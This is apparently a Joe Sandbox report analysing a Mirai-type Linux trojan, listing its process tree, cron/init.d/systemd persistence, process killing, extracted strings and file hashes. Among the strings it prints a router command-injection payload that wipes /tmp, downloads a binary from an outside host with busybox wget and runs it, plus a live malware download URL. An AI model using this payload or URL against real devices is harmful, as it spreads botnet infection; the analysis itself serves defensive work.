Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
3.elf

Overview

General Information

Sample name:3.elf
Analysis ID:1587319
MD5:647ec524d36c47ac9dc1c4c05c30e7ab
SHA1:be9c4e9ebd6243e55257a6b2f20ef3299f34a286
SHA256:60cf037d682bb28c7594d93f1d2bc8f1bac75b7b32a5a4caef81b68dc346d7b2
Tags:elfuser-abuse_ch
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Drops files in suspicious directories
Executes the "crontab" command typically for achieving persistence
Sample tries to kill multiple processes (SIGKILL)
Sample tries to persist itself using System V runlevels
Sample tries to persist itself using cron
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "systemctl" command used for controlling the systemd system and service manager
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sleeps for long times indicative of sandbox evasion
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1587319
Start date and time:2025-01-10 06:52:06 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 42s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:3.elf
Detection:MAL
Classification:mal68.spre.troj.evad.linELF@0/7@0/0
  • Skipping network analysis since amount of network traffic is too extensive
  • VT rate limit hit for: http://103.136.41.100/3.elf
  • VT rate limit hit for: http://103.136.41.100/3.elf;
Command:/tmp/3.elf
PID:6243
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
gosh that chinese family at the other table sure ate a lot
Standard Error:Failed to start hello.service: Unit hello.service has a bad unit file setting.
See system logs and 'systemctl status hello.service' for details.
  • system is lnxubuntu20
  • 3.elf (PID: 6243, Parent: 6162, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/3.elf
    • 3.elf New Fork (PID: 6254, Parent: 6243)
    • sh (PID: 6254, Parent: 6243, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload"
      • sh New Fork (PID: 6256, Parent: 6254)
      • systemctl (PID: 6256, Parent: 6254, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
    • 3.elf New Fork (PID: 6261, Parent: 6243)
    • sh (PID: 6261, Parent: 6243, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl start hello.service"
      • sh New Fork (PID: 6271, Parent: 6261)
      • systemctl (PID: 6271, Parent: 6261, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start hello.service
    • 3.elf New Fork (PID: 6272, Parent: 6243)
    • sh (PID: 6272, Parent: 6243, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab /tmp/crontab.tmp"
      • sh New Fork (PID: 6278, Parent: 6272)
      • crontab (PID: 6278, Parent: 6272, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab /tmp/crontab.tmp
    • 3.elf New Fork (PID: 6279, Parent: 6243)
    • sh (PID: 6279, Parent: 6243, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "update-rc.d hello defaults"
      • sh New Fork (PID: 6284, Parent: 6279)
      • update-rc.d (PID: 6284, Parent: 6279, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d hello defaults
        • systemctl (PID: 6285, Parent: 6284, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
    • 3.elf New Fork (PID: 6291, Parent: 6243)
      • 3.elf New Fork (PID: 6293, Parent: 6291)
        • 3.elf New Fork (PID: 6295, Parent: 6293)
        • 3.elf New Fork (PID: 6298, Parent: 6293)
        • 3.elf New Fork (PID: 6300, Parent: 6293)
        • 3.elf New Fork (PID: 6302, Parent: 6293)
        • 3.elf New Fork (PID: 6383, Parent: 6293)
          • 3.elf New Fork (PID: 6385, Parent: 6383)
  • wrapper-2.0 (PID: 6245, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
  • wrapper-2.0 (PID: 6246, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
  • wrapper-2.0 (PID: 6247, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
  • wrapper-2.0 (PID: 6248, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
  • wrapper-2.0 (PID: 6249, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
  • wrapper-2.0 (PID: 6250, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
  • systemd New Fork (PID: 6258, Parent: 6257)
  • snapd-env-generator (PID: 6258, Parent: 6257, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6287, Parent: 6286)
  • snapd-env-generator (PID: 6287, Parent: 6286, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 3.elfVirustotal: Detection: 28%Perma Link
Source: 3.elfReversingLabs: Detection: 31%
Source: /tmp/3.elf (PID: 6243)Socket: 127.0.0.1:23476Jump to behavior
Source: 3.elfString found in binary or memory: http://%d.%d.%d.%d/%s
Source: 3.elfString found in binary or memory: http://%d.%d.%d.%d/%s;
Source: 3.elfString found in binary or memory: http://%d.%d.%d.%d/2;
Source: 3.elf, 6243.1.00007f9a80036000.00007f9a8003b000.rw-.sdmp, 3.elf, 6291.1.00007f9a80036000.00007f9a8003b000.rw-.sdmpString found in binary or memory: http://1/wget.sh
Source: hello.service.12.dr, hello.12.drString found in binary or memory: http://103.136.41.100/3.elf
Source: tmp.IU1U0U.40.dr, crontab.tmp.12.drString found in binary or memory: http://103.136.41.100/3.elf;
Source: 3.elf, 6243.1.00007f9a80036000.00007f9a8003b000.rw-.sdmp, 3.elf, 6291.1.00007f9a80036000.00007f9a8003b000.rw-.sdmpString found in binary or memory: http://9/curl.sh
Source: 3.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 3.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

System Summary

barindex
Source: /tmp/3.elf (PID: 6243)SIGKILL sent: pid: 2018, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6243)SIGKILL sent: pid: 2077, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6243)SIGKILL sent: pid: 2078, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6243)SIGKILL sent: pid: 2079, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6243)SIGKILL sent: pid: 2080, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6243)SIGKILL sent: pid: 2083, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6243)SIGKILL sent: pid: 2084, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6243)SIGKILL sent: pid: 2156, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6243)SIGKILL sent: pid: 6245, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6243)SIGKILL sent: pid: 6246, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6243)SIGKILL sent: pid: 6247, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6243)SIGKILL sent: pid: 6248, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6243)SIGKILL sent: pid: 6249, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6243)SIGKILL sent: pid: 6250, result: successfulJump to behavior
Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/*; /bin/busybox wget -g %d.%d.%d.%d -l /tmp/.vs -r /h; /bin/busybox chmod 777 /tmp/.vs; /tmp/.vs; sh /tmp/.vs)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sampleString containing 'busybox' found: %s%d%s<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/*; /bin/busybox wget -g %d.%d.%d.%d -l /tmp/.vs -r /h; /bin/busybox chmod 777 /tmp/.vs; /tmp/.vs; sh /tmp/.vs)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: ELF static info symbol of initial sample.symtab present: no
Source: /tmp/3.elf (PID: 6243)SIGKILL sent: pid: 2018, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6243)SIGKILL sent: pid: 2077, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6243)SIGKILL sent: pid: 2078, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6243)SIGKILL sent: pid: 2079, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6243)SIGKILL sent: pid: 2080, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6243)SIGKILL sent: pid: 2083, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6243)SIGKILL sent: pid: 2084, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6243)SIGKILL sent: pid: 2156, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6243)SIGKILL sent: pid: 6245, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6243)SIGKILL sent: pid: 6246, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6243)SIGKILL sent: pid: 6247, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6243)SIGKILL sent: pid: 6248, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6243)SIGKILL sent: pid: 6249, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6243)SIGKILL sent: pid: 6250, result: successfulJump to behavior
Source: classification engineClassification label: mal68.spre.troj.evad.linELF@0/7@0/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 6278)Crontab executable: /usr/bin/crontab -> crontab /tmp/crontab.tmpJump to behavior
Source: /usr/sbin/update-rc.d (PID: 6284)File: /etc/rc2.d/S01hello -> ../init.d/helloJump to behavior
Source: /usr/sbin/update-rc.d (PID: 6284)File: /etc/rc3.d/S01hello -> ../init.d/helloJump to behavior
Source: /usr/sbin/update-rc.d (PID: 6284)File: /etc/rc4.d/S01hello -> ../init.d/helloJump to behavior
Source: /usr/sbin/update-rc.d (PID: 6284)File: /etc/rc5.d/S01hello -> ../init.d/helloJump to behavior
Source: /usr/sbin/update-rc.d (PID: 6284)File: /etc/rc0.d/K01hello -> ../init.d/helloJump to behavior
Source: /usr/sbin/update-rc.d (PID: 6284)File: /etc/rc1.d/K01hello -> ../init.d/helloJump to behavior
Source: /usr/sbin/update-rc.d (PID: 6284)File: /etc/rc6.d/K01hello -> ../init.d/helloJump to behavior
Source: /usr/bin/crontab (PID: 6278)File: /var/spool/cron/crontabs/tmp.IU1U0UJump to behavior
Source: /usr/bin/crontab (PID: 6278)File: /var/spool/cron/crontabs/rootJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/6227/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/6227/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/6227/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/6227/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/6227/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/6226/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/6226/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/6226/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/6226/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/6226/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2307/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2307/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2307/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2307/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/2307/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6243)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/3.elf (PID: 6254)Shell command executed: sh -c "systemctl daemon-reload"Jump to behavior
Source: /tmp/3.elf (PID: 6261)Shell command executed: sh -c "systemctl start hello.service"Jump to behavior
Source: /tmp/3.elf (PID: 6272)Shell command executed: sh -c "crontab /tmp/crontab.tmp"Jump to behavior
Source: /tmp/3.elf (PID: 6279)Shell command executed: sh -c "update-rc.d hello defaults"Jump to behavior
Source: /bin/sh (PID: 6256)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /bin/sh (PID: 6271)Systemctl executable: /usr/bin/systemctl -> systemctl start hello.serviceJump to behavior
Source: /usr/sbin/update-rc.d (PID: 6285)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /tmp/3.elf (PID: 6243)Writes shell script file to disk with an unusual file extension: /etc/init.d/helloJump to dropped file
Source: submitted sampleStderr: Failed to start hello.service: Unit hello.service has a bad unit file setting.See system logs and 'systemctl status hello.service' for details.: exit code = 0

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/3.elf (PID: 6243)File: /etc/init.d/helloJump to dropped file
Source: /tmp/3.elf (PID: 6385)Sleeps longer then 60s: 60.0sJump to behavior
Source: /tmp/3.elf (PID: 6243)Queries kernel information via 'uname': Jump to behavior
Source: 3.elf, 6243.1.0000565103aff000.0000565103c50000.rw-.sdmp, 3.elf, 6291.1.0000565103aff000.0000565103c50000.rw-.sdmpBinary or memory string: QV!/etc/qemu-binfmt/arm
Source: 3.elf, 6243.1.0000565103aff000.0000565103c50000.rw-.sdmp, 3.elf, 6291.1.0000565103aff000.0000565103c50000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: 3.elf, 6243.1.00007ffd744f9000.00007ffd7451a000.rw-.sdmpBinary or memory string: PV/tmp/qemu-open.UsLW8f:U
Source: 3.elf, 6243.1.00007ffd744f9000.00007ffd7451a000.rw-.sdmp, 3.elf, 6291.1.00007ffd744f9000.00007ffd7451a000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: 3.elf, 6243.1.00007ffd744f9000.00007ffd7451a000.rw-.sdmpBinary or memory string: /tmp/qemu-open.UsLW8f
Source: 3.elf, 6243.1.00007ffd744f9000.00007ffd7451a000.rw-.sdmp, 3.elf, 6291.1.00007ffd744f9000.00007ffd7451a000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/3.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/3.elf
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts1
Scheduled Task/Job
1
Systemd Service
1
Systemd Service
1
Masquerading
1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network Medium1
Service Stop
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scheduled Task/Job
1
Scheduled Task/Job
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Scripting
Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1587319 Sample: 3.elf Startdate: 10/01/2025 Architecture: LINUX Score: 68 57 Multi AV Scanner detection for submitted file 2->57 9 3.elf 2->9         started        13 xfce4-panel wrapper-2.0 2->13         started        15 xfce4-panel wrapper-2.0 2->15         started        17 6 other processes 2->17 process3 file4 51 /tmp/crontab.tmp, ASCII 9->51 dropped 53 /etc/init.d/hello, Bourne-Again 9->53 dropped 59 Sample tries to kill multiple processes (SIGKILL) 9->59 61 Drops files in suspicious directories 9->61 19 3.elf sh 9->19         started        21 3.elf sh 9->21         started        23 3.elf 9->23         started        25 2 other processes 9->25 signatures5 process6 process7 27 sh crontab 19->27         started        31 sh update-rc.d 21->31         started        33 3.elf 23->33         started        35 sh systemctl 25->35         started        37 sh systemctl 25->37         started        file8 55 /var/spool/cron/crontabs/tmp.IU1U0U, ASCII 27->55 dropped 63 Sample tries to persist itself using cron 27->63 65 Executes the "crontab" command typically for achieving persistence 27->65 67 Sample tries to persist itself using System V runlevels 31->67 39 update-rc.d systemctl 31->39         started        41 3.elf 33->41         started        43 3.elf 33->43         started        45 3.elf 33->45         started        47 2 other processes 33->47 signatures9 process10 process11 49 3.elf 41->49         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
3.elf29%VirustotalBrowse
3.elf32%ReversingLabsLinux.Trojan.Mirai
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://103.136.41.100/3.elf0%Avira URL Cloudsafe
http://103.136.41.100/3.elf;0%Avira URL Cloudsafe
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://%d.%d.%d.%d/%s3.elffalse
    high
    http://1/wget.sh3.elf, 6243.1.00007f9a80036000.00007f9a8003b000.rw-.sdmp, 3.elf, 6291.1.00007f9a80036000.00007f9a8003b000.rw-.sdmpfalse
      high
      http://103.136.41.100/3.elf;tmp.IU1U0U.40.dr, crontab.tmp.12.drtrue
      • Avira URL Cloud: safe
      unknown
      http://schemas.xmlsoap.org/soap/encoding/3.elffalse
        high
        http://%d.%d.%d.%d/%s;3.elffalse
          high
          http://9/curl.sh3.elf, 6243.1.00007f9a80036000.00007f9a8003b000.rw-.sdmp, 3.elf, 6291.1.00007f9a80036000.00007f9a8003b000.rw-.sdmpfalse
            high
            http://%d.%d.%d.%d/2;3.elffalse
              high
              http://103.136.41.100/3.elfhello.service.12.dr, hello.12.drtrue
              • Avira URL Cloud: safe
              unknown
              http://schemas.xmlsoap.org/soap/envelope/3.elffalse
                high
                No contacted IP infos
                No context
                No context
                No context
                No context
                No context
                Process:/tmp/3.elf
                File Type:Bourne-Again shell script, ASCII text executable
                Category:dropped
                Size (bytes):593
                Entropy (8bit):4.670812469959631
                Encrypted:false
                SSDEEP:12:i5BpMp5kTMp5Gu+a6zAFNieiXMi82KjsrxylKNVUdURucTyl:ifpMr8MrPd6zAGV78jjsrxy8bp4
                MD5:108FBAD4D89105C11783B197DD8ADB79
                SHA1:89F053233189A49465C3DEE075D5D24E1C52E0AB
                SHA-256:AACE3D35F8BDFF7D95E1351E083D81022AC626107E92BE6803F92E900E76BDF7
                SHA-512:A9A4057DBCDF8FA00B7DC420A0A8C69770A8E354CDB59847790D39E6D5A88B5E848D09517349B4D32E44DEFB4CFB26D6FA34A7CA4B2BA6E06662548BD72E78A9
                Malicious:true
                Reputation:low
